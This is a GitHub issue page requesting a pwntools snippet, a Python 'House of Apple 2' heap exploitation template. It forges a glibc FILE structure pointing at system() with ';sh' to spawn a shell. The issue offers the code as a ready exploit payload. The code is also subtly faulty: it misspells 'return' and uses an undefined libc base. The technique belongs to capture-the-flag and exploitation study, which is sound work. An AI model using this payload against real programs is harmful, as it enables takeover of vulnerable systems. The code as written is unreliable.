[POC Snippet Request] pwntools

### Category

pwn

### Tool

pwntools

### Snippet Name

pwntools heap exploit function alias

### Snippet Content

```python
def house_of_apple_sys(heap_base):
  io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
  sys_addr = libc_base + libc.sym['system']

  payload = p32(0xfffff7f5) + b";sh\x00" + p64(0)
  payload+= p64(0)*2
  payload+= p64(0) + p64(1)
  payload+= b"\x00"*0x38 + p64(sys_addr) + b"\x00"*0x30 + p64(heap_base+0x0) # payload头地址
  payload+= b"\x00"*0x30+ p64(io_wfile_jumps)
  payload+= p64(heap_base+0x0) # payload头地址
  retrun payload
```

### Short Description

pwntools' house of apple 2 template (No sandbox)

### Trigger Prefix

def house_of_apple_s

### Language

python

### more detail.

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[POC Snippet Request] pwntools #8

Category

Tool

Snippet Name

Snippet Content

Short Description

Trigger Prefix

Language

more detail.

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[POC Snippet Request] pwntools #8

Description

Category

Tool

Snippet Name

Snippet Content

Short Description

Trigger Prefix

Language

more detail.

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions